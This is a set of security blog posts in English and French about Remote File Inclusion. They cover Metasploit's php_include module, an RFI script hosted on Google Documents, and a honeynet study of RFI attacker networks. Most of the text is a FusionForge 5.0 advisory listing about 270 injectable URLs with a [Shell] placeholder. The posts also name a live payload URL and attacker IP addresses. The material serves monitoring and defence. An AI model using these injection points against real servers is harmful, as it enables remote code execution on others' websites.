Playing with Remote File Inclusion in Metasploit

Exploiting Remote File Inclusion (RFI) through Metasploit is a kid game. The 29 January 2010, RSnake has release a database of more than 2000 Remote File  Inclusion vulnerable URL’s. This RFI vulnerable database was compiled mainly from Milw0rm and OSVDB, and integrated the 15 February 2010 by HD Moore into Metasploit with the objective to be integrated into the already existing “php_include” exploit.

All the URLs present into the database are finished with “XXpathXX” how will execute the desired payload, for example “reverse_php“.

If you don’t specify any specific RFI target the RFI database will be used by default. To focus on a specific URL, just set PHPURI to the desired URL and finish they with “XXpathXX“. For example :

set PHPURI /index.php?COLOR=XXpathXX

When you check the HTTP Server log, you will see the related RFI attempts, but no way to distinguish RFI bot scan to Metasploit scan, no specific user agent by default is provided by Metasploit for “php_include” exploit. You can configure one, by setting the advanced configurations of the exploit (show advanced). To setup a specific user agent is interesting to create specific IDS rules in order to detect the tool how has create theses attempts during an QA for example.

The RFI database integrated into Metasploit is actually 3 months old, and don’t represent any more the existing exploits, but you have the facility to create your own database and use it.

Google Documents participate in Remote File Inclusion networks propagation

Our Honey Net has report that an Remote File Inclusion (RFI) is actually hosted on Google Documents and participating in RFI networks propagation.

This document “shfx1” has been created by Markantil Google user since 18/11/2009.

Google Documents hosting Remote File Inclusion scripts
Google Documents hosting Remote File Inclusion scripts

Multiples vulnérabilités RFI pour FusionForge 5.0

cr4wl3r a rapporté de multiples vulnérabilités du type Remote File Inclusion (RFI) pour FusionForge 5.0, qui pourraient permettre à un internaute malveillant de compromettre un système vulnérable.

La liste des pages vulnérables est très longue (voir ci-dessous) et le nombre de paramètres affectés sont aussi assez nombreux. Ces erreurs pourraient permettre d’inclure du code distant et que celui-ci s’exécute dans le contexte du serveur web hébergeant l’application FusionForge 5.0.

Les vulnérabilités ont été rapportées pour la version 5.0, mais d’autres versions pourraient être affectées.

Le nombre de sites web utilisant cet applicatif sont très nombreux que ce soit au niveau international ou uniquement en France. Différents organismes gouvernementaux utilisent cet applicatif, et il est sûr et certain qu’ils seront bientôt la cible de scanner RFI et de tentatives d’exploitations. Une simple requête Google sur le terme “Powered by FusionForge” démontre la quantité énorme de sites web utilisant cet applicatif.

http://shell4u.tk/[path]/common/docman/Document.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/docman/DocumentFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/docman/DocumentGroup.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/forum/Forum.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/forum/ForumsForUser.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/forum/ForumFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/forum/ForumMessage.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/forum/ForumMessageFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/frs/FRSFile.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/frs/FRSPackage.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/frs/FRSRelease.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/MailParser.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/SCMPlugin.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/FusionForge.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/GroupJoinRequest.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/Permission.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/Role.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/session.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/RoleObserver.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/Group.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/System.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/User.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/common/include/system/LDAP.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/system/NSSPGSQL.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/system/pgsql.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/include/system/UNIX.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/mail/MailingList.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/mail/MailingListFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/import_utils.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/ProjectTask.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/ProjectCategory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/ProjectTaskFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/ProjectGroup.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/ProjectTasksForUser.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/pm/ProjectGroupFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportGroupCum.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportSiteAct.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportUserAdded.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportProjectAct.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportSiteTime.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportUserCum.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportDownloads.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportProjectTime.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportTrackerAct.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportUserTime.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportGroupAdded.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportSetup.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/ReportUserAct.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/reporting/TimeEntry.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/scm/SCMFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/ArtifactSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/ForumsSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/ProjectSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/TrackersSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/DocsSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/FrsSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/ExportProjectSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/NewsSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/SkillSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/ForumSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/PeopleSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/search/TasksSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/survey/SurveyResponse.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/survey/SurveyFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/survey/SurveyResponseFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/survey/SurveyQuestion.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/survey/SurveyQuestionFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/Artifact.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactExtraField.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactFromID.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactQueryFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactTypeFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactExtraFieldElement.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactHistory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/Artifacts.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactTypes.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactBoxOptions.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactFactory.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactMessage.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactsForUser.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactCanned.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactFile.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/common/tracker/ArtifactType.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/cronjobs/forum_gateway.php?gfwww=[Shell]
http://shell4u.tk/[path]/cronjobs/ftp_create_group_access.php?gfwww=[Shell]
http://shell4u.tk/[path]/cronjobs/send_pending_items_mail.php?gfwww=[Shell]
http://shell4u.tk/[path]/cronjobs/stats_projects-backfill.php?gfwww=[Shell]
http://shell4u.tk/[path]/cronjobs/tracker_gateway.php?gfwww=[Shell]
http://shell4u.tk/[path]/cronjobs/update_filesize.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/aselectextauth/include/ASelectAuthPlugin.class.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/aselectextauth/include/aselectextauth-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/contribtracker/common/contribtracker-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/contribtracker/common/cvssyncmail-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/contribtracker/include/cvssyncmail-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/cvstracker/common/cvstracker-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/eirc/include/eirc-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/eirc/www/eirc.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/externalsearch/include/ExternalHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/externalsearch/include/ExternalSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/externalsearch/include/externalsearch-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/externalsearch/include/ExternalSearchPlugin.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/extratabs/extratabs-init.php?GLOBALS[sys_plugins_path]=[Shell]
http://shell4u.tk/[path]/plugins/fckeditor/common/fckeditor-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/globalsearch/common/globalsearch-init.php?GLOBALS[sys_plugins_path]=[Shell]
http://shell4u.tk/[path]/plugins/helloworld/common/helloworld-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/ldapextauth/include/ldapextauth-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/ldapextauth/include/LdapExtAuthPlugin.class.php?GLOBALS[gfcommon]=[Shell]
http://shell4u.tk/[path]/plugins/mantis/include/mantis-init.php?gfplugins?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/mediawiki/common/mediawiki-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/online_help/common/online_help-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/projectlabels/common/projectlabels-init.phpGLOBALS[sys_plugins_path]=[Shell]
http://shell4u.tk/[path]/plugins/projects_hierarchy/common/projects_hierarchy-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/projects_hierarchy/www/wait_son.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/quota_management/common/quota_management-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/quota_management/www/index.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/quota_management/www/quota.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/quota_management/www/quota_admin.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/quota_management/www/quota_project.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/scmarch/common/scmarch-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmbzr/common/scmbzr-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmccase/common/scmccase-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmcpold/common/scmcpold-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmcvs/common/scmcvs-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmcvs/ftp_create.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/scmdarcs/common/scmdarcs-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmgit/common/scmgit-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmhg/common/scmhg-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/scmsvn/common/scmsvn-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/svncommitemail/common/svncommitemail-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/svntracker/bin/post.php?gfconfig=[Shell]
http://shell4u.tk/[path]/plugins/svntracker/common/svntracker-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/common/webcalendar-init.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/activity_log.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/add_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/admin.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/admin_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/adminhome.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/approve_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/assistant_edit.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/assistant_edit_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/availability.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/category.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/category_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/colors.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/datesel.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/day.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/del_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/del_layer.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_entry_handler.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_layer.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_layer_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_nonusers.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_nonusers_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_report.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_report_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_template.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_user.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/edit_user_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/export.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/export_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/group_edit.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/group_edit_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_admin.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_bug.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_edit_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_import.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_index.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_layers.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/help_pref.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/import.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/import_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/layers.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/layers_toggle.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/list_unapproved.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/month.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/nonusers_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/pref.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/purge.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/reject_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/report.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/search.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/search_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/select_user.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/set_entry_cat.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/users.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/usersel.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_d.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_entry.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_l.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_m.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_t.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_v.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/view_w.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/views.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/views_edit.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/views_edit_handler.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/week.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/week_details.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/webcalendar/www/year.php?gfplugins=[Shell]
http://shell4u.tk/[path]/plugins/wiki/common/WikiGroupSearchEngine.class.php?GLOBALS[gfwww]=[Shell]
http://shell4u.tk/[path]/plugins/wiki/common/WikiSearchEngine.class.php?GLOBALS[gfwww]=[Shell]
http://shell4u.tk/[path]/plugins/wiki/common/WikiHtmlSearchRenderer.class.php?GLOBALS[gfwww]=[Shell]
http://shell4u.tk/[path]/plugins/wiki/common/WikiSearchQuery.class.php?GLOBALS[gfcommon]=[Shell]
http://shell4u.tk/[path]/plugins/wiki/include/WikiGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/wiki/include/WikiSearchEngine.class.php?GLOBALS[gfwww]=[Shell]
http://shell4u.tk/[path]/plugins/wiki/include/WikiHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/plugins/wiki/include/WikiSearchQuery.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/utils/fixscripts/tools_data_cleanup.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/index_std.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/docman/include/DocumentGroupHTML.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/forum/admin/ForumAdmin.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/forum/include/AttachManager.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/forum/include/ForumHTML.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/include/stats_function.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/include/user_home.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/include/features_boxes.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/include/note.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/include/pre.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/include/Layout.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/include/project_home.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/admin_ha.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/activity.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/adminhom.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/add_entr.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/approve_.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/admin.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/plugins/webcalendar/assistan.php?gfplugins=[Shell]
http://shell4u.tk/[path]/www/pm/add_task.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/pm/mod_task.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/pm/browse_task.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/pm/postuploadcsv.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/pm/downloadcsv.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/pm/include/ProjectGroupHTML.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/pm/include/ProjectTaskHTML.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/pm/msproject/msp.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/pm/msproject/xmlparser.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/reporting/timeentry.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/search/include/SearchManager.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/ArtifactSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/FrsGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/TasksGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/DocsGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/GroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/TrackersGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/ForumSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/NewsGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/engines/ForumsGroupSearchEngine.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/AdvancedSearchHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/ForumsHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/HtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/ProjectRssSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/TasksHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/ArtifactHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/FrsHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/NewsHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/RssSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/TrackersHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/DocsHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/FullProjectHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/PeopleHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/ForumHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/HtmlGroupSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/ProjectHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/search/include/renderers/SkillHtmlSearchRenderer.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/soap/common/group.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/common/user.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/docman/docman.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/frs/frs.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/pm/pm.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/reporting/timeentry.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/tracker/query.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/soap/tracker/tracker.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/squal/get_session_hash.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/survey/include/SurveyHTML.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/themes/gforge/Theme.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/themes/gforge-classic/Theme.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/themes/gforge-simple-theme/Theme.class.php?gfwww=[Shell]
http://shell4u.tk/[path]/www/tracker/browse.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/tracker/downloadcsv.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/tracker/query.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/tracker/include/ArtifactFileHtml.class.php?gfcommon=[Shell]
http://shell4u.tk/[path]/www/tracker/include/ArtifactHtml.class.php?gfcommon=[Shell]

Exemple d’un maillage simple de réseau RFI

j’avais abordé dans un billet précédent une étude sur un RFI et le principe des attaques par intermédiaire. Cette étude se limitait sur une attaque avec simplement trois adresses IP impliquées (celle de l’attaquant, celle de la cible et celle de l’intermédiaire).

Ce qui est plus intéressant à faire est d’essayer de modéliser les réseaux RFI en place et leurs maillages. Ce billet traitera d’un exemple simple de maillage RFI.

82.194.87.219 situé à Bilbao en Espagne, tente, en tant qu’attaquant à inclure sur la cible ZATAZ, situé en France, un payload localisé sur l’intermédiaire 195.114.18.99 (aka www.laubrotel.com) lui aussi situé en France.

Events source de 82.194.87.219 en relation avec le payload localisé sur l’intermédiaire 195.114.18.99 durant le dernier mois.

82.194.87.219, l’attaquant, a été vu la première fois le 2009-04-22 à 06:07:02 et la dernière fois le 2009-06-27 à 01:03:33, et à générer une totalité de 520 events. Celui-ci est en fait un serveur d’hébergement mutualisé (voir les sites référencés sur cette adresses IP) qui est aussi sûrement compromis de puis plus de 2 mois.

195.114.18.99, l’intermédiaire, a été vu la première fois le 2009-02-20 à 21:51:43 et la dernière fois le 2009-06-27 à 01:03:33, et à été impliqué dans près de 559 events. Le payload, toujours actif (http://www.laubrotel.com/letter/id?), est du à une mise à jour non effectué sur un Joomla. Ce site web est maintenant compromis depuis plus de 4 mois.

Nous voyons donc que l’intermédiaire, aka 195.114.18.99, a une durée de vie beaucoup plus grande que l’attaquant, ce qui sous-entend donc, que le payload a été utilisé au préalable par d’autres attaquant.

Vous pourrez trouvez donc ci-dessous, après un petit développement et une petite analyse tous les attaquants ayant été en relation avec l’intermédiaire 195.114.18.99.

Ce qui donne la représentation GoogleMap, de tous le cycle de vie de l’intermédiaire suivant.

L’on peut voir ici que cet intermédiaire a été utilisé par différents attaquants qui sont sûrement liés au même réseau.

Le prochaine billet portera sur une étude plus complexe du maillage des réseaux RFI.